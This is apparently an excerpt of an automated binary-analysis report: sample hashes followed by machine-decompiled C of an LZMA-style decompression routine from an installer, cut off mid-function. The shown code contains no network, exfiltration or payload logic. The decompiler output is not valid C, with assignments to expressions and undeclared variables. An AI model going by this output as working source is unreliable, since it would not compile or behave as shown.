                                                                                                                                                                                                                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                                                                                                                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00407068() {
                                                                                                                                                                                                                            				unsigned short _t531;
                                                                                                                                                                                                                            				signed int _t532;
                                                                                                                                                                                                                            				void _t533;
                                                                                                                                                                                                                            				signed int _t534;
                                                                                                                                                                                                                            				signed int _t535;
                                                                                                                                                                                                                            				signed int _t565;
                                                                                                                                                                                                                            				signed int _t568;
                                                                                                                                                                                                                            				signed int _t589;
                                                                                                                                                                                                                            				signed int* _t606;
                                                                                                                                                                                                                            				void* _t613;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                                                            						 *(_t613 - 0x84) = 0xa;
                                                                                                                                                                                                                            						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                                            						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							L133:
                                                                                                                                                                                                                            							_t531 =  *_t606;
                                                                                                                                                                                                                            							_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                                                            							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                                            							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                                            								 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                                            								_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                                            								 *_t606 = _t532;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                                            								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            								goto L139;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L137:
                                                                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(_t613 - 0x88) = 5;
                                                                                                                                                                                                                            								L170:
                                                                                                                                                                                                                            								_t568 = 0x22;
                                                                                                                                                                                                                            								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                                                            								_t535 = 0;
                                                                                                                                                                                                                            								L172:
                                                                                                                                                                                                                            								return _t535;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							L139:
                                                                                                                                                                                                                            							_t533 =  *(_t613 - 0x84);
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                            									L1:
                                                                                                                                                                                                                            									_t534 =  *(_t613 - 0x88);
                                                                                                                                                                                                                            									if(_t534 > 0x1c) {
                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                                                                                                                                                            										case 0:
                                                                                                                                                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            											_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                                                                                            											if(_t534 > 0xe1) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                                                            											_push(0x2d);
                                                                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                                                                            											_pop(_t570);
                                                                                                                                                                                                                            											_push(9);
                                                                                                                                                                                                                            											_pop(_t571);
                                                                                                                                                                                                                            											_t609 = _t538 / _t570;
                                                                                                                                                                                                                            											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                                                                            											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                                                            											 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                                                            											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                                                            											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                                                            											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                                                            											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                                                            												L10:
                                                                                                                                                                                                                            												if(_t612 == 0) {
                                                                                                                                                                                                                            													L12:
                                                                                                                                                                                                                            													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            													goto L15;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L11;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												do {
                                                                                                                                                                                                                            													L11:
                                                                                                                                                                                                                            													_t612 = _t612 - 1;
                                                                                                                                                                                                                            													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                                                            												} while (_t612 != 0);
                                                                                                                                                                                                                            												goto L12;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											if( *(_t613 - 4) != 0) {
                                                                                                                                                                                                                            												GlobalFree( *(_t613 - 4));
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                                            											 *(_t613 - 4) = _t534;
                                                                                                                                                                                                                            											if(_t534 == 0) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                                                            												goto L10;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 1:
                                                                                                                                                                                                                            											L13:
                                                                                                                                                                                                                            											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(_t613 - 0x88) = 1;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            											_t45 = _t613 - 0x48;
                                                                                                                                                                                                                            											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t45;
                                                                                                                                                                                                                            											L15:
                                                                                                                                                                                                                            											if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                                                            												goto L13;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t546 =  *(_t613 - 0x40);
                                                                                                                                                                                                                            											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                                                            												L20:
                                                                                                                                                                                                                            												 *(_t613 - 0x48) = 5;
                                                                                                                                                                                                                            												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                                            												goto L23;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t613 - 0x74) = _t546;
                                                                                                                                                                                                                            											if( *(_t613 - 8) != 0) {
                                                                                                                                                                                                                            												GlobalFree( *(_t613 - 8));
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                                                                            											 *(_t613 - 8) = _t534;
                                                                                                                                                                                                                            											if(_t534 == 0) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L20;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 2:
                                                                                                                                                                                                                            											L24:
                                                                                                                                                                                                                            											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                                                                            											 *(_t613 - 0x84) = 6;
                                                                                                                                                                                                                            											 *(_t613 - 0x4c) = _t553;
                                                                                                                                                                                                                            											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                                                            											 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            											goto L133;
                                                                                                                                                                                                                            										case 3:
                                                                                                                                                                                                                            											L21:
                                                                                                                                                                                                                            											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(_t613 - 0x88) = 3;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            											_t67 = _t613 - 0x70;
                                                                                                                                                                                                                            											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            											__eflags =  *_t67;
                                                                                                                                                                                                                            											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L23:
                                                                                                                                                                                                                            											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                                                                            											if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                                                                            												goto L21;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											goto L24;
                                                                                                                                                                                                                            										case 4:
                                                                                                                                                                                                                            											L133:
                                                                                                                                                                                                                            											_t531 =  *_t606;
                                                                                                                                                                                                                            											_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                                                            											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                                            											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                                            												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                                            												 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                                            												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                                            												 *_t606 = _t532;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L139;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 5:
                                                                                                                                                                                                                            											goto L137;
                                                                                                                                                                                                                            										case 6:
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            													goto L133;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                                            											__cl = 8;
                                                                                                                                                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                                            													_t98 = __ebp - 0x38;
                                                                                                                                                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                                            													__eflags =  *_t98;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 8);
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            												goto L41;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 7:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            												goto L69;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            												goto L133;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 8:
                                                                                                                                                                                                                            											goto L0;
                                                                                                                                                                                                                            										case 9:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												goto L89;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                                            											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                                            											__eflags = _t258;
                                                                                                                                                                                                                            											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                                                            											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                                                            											goto L75;
                                                                                                                                                                                                                            										case 0xa:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            													goto L133;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            											goto L88;
                                                                                                                                                                                                                            										case 0xb:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            											L88:
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											L89:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            											goto L69;
                                                                                                                                                                                                                            										case 0xc:
                                                                                                                                                                                                                            											L99:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t334 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t334;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											goto L101;
                                                                                                                                                                                                                            										case 0xd:
                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t122 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t122;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L39:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            												goto L48;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                                                                            												goto L54;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L41:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                                            											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                                                                            											__eax = __eax << 8;
                                                                                                                                                                                                                            											__eax = __eax + __ebx;
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            											__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            												0x800 = 0x800 - __edx;
                                                                                                                                                                                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L39;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L37;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0xe:
                                                                                                                                                                                                                            											L46:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
